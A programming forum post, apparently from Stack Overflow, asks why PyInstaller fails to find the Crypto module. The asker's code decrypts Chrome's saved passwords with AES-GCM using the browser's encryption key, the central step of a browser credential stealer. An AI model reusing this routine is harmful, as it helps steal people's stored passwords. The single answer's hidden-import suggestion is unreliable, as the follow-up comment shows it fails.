# how to properly import the Crypto module in py installer

Tags: python-3.x, pyinstaller

ModuleNotFoundError: No module named 'Crypto'
[15312] Failed to execute script 'main' due to unhandled exception!

pyinstaller --noconfirm --onefile --console --hidden-import "Crypto" "main.py"

i tried to import via hidden import but nothing comes out`class import ChromeSelya
from Crypto.Cipher import AES

```
import ChromeSelya # this is my package inside the project
from Crypto.Cipher import AES

class Decrypt:

    def decrypt_data(self, ciphertext):
        initialisation_vector = ciphertext[3:15]
        encrypted_password = ciphertext[15:-16]
        cipher = AES.new(ChromeSelya.Browser().get_encryption_key(), AES.MODE_GCM, initialisation_vector)
        decrypted_pass = cipher.decrypt(encrypted_password)
        decrypted_pass = decrypted_pass.decode()
        return decrypted_pass
```

Comment: create a [mre].

Comment: Please provide enough code so others can better understand or reproduce the problem.

Answer (score 0):

Make sure that the module name matches the one you installed (pycryptodome), not Crypto.

Then you can use:

```
pyinstaller --noconfirm --onefile --console --hidden-import "pycryptodome" "main.py"
```

Hope it works

Comment: now there is another error: Analyzing hidden import 'pycryptodome'
7673 ERROR: Hidden import 'pycryptodome' not found